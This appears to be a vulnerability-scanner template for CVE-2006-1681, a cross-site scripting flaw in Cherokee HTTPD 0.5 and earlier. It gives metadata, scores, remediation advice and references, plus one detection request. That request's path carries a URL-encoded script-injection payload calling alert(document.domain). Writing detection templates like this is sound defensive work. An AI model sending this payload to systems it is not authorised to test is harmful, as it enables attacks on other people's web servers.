id: CVE-2006-1681 info: name: Cherokee HTTPD <=0.5 - Cross-Site Scripting author: geeknik severity: medium description: Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated. remediation: | Upgrade to a patched version of Cherokee HTTPD or apply the necessary security patches to mitigate the XSS vulnerability. reference: - http://www.vupen.com/english/advisories/2006/1292 - https://nvd.nist.gov/vuln/detail/CVE-2006-1681 - https://exchange.xforce.ibmcloud.com/vulnerabilities/25698 - https://security.gentoo.org/glsa/202012-09 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2006-1681 cwe-id: NVD-CWE-Other epss-score: 0.01015 epss-percentile: 0.82076 cpe: cpe:2.3:a:cherokee:cherokee_httpd:0.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cherokee product: cherokee_httpd tags: cherokee,httpd,xss,cve,cve2006 http: - method: GET path: - "{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - "" - type: word part: header words: - text/html - type: status status: - 200 # digest: 4a0a004730450220052e637e67503ceb868b0d3bd95e9f8ebf125edabaaf2226b798be4164e25635022100f27514ec54f494d35629127e6018ac62a7893bfba7b0751bc635c66d2a463fdb:922c64590222798bb761d5b6d8e72950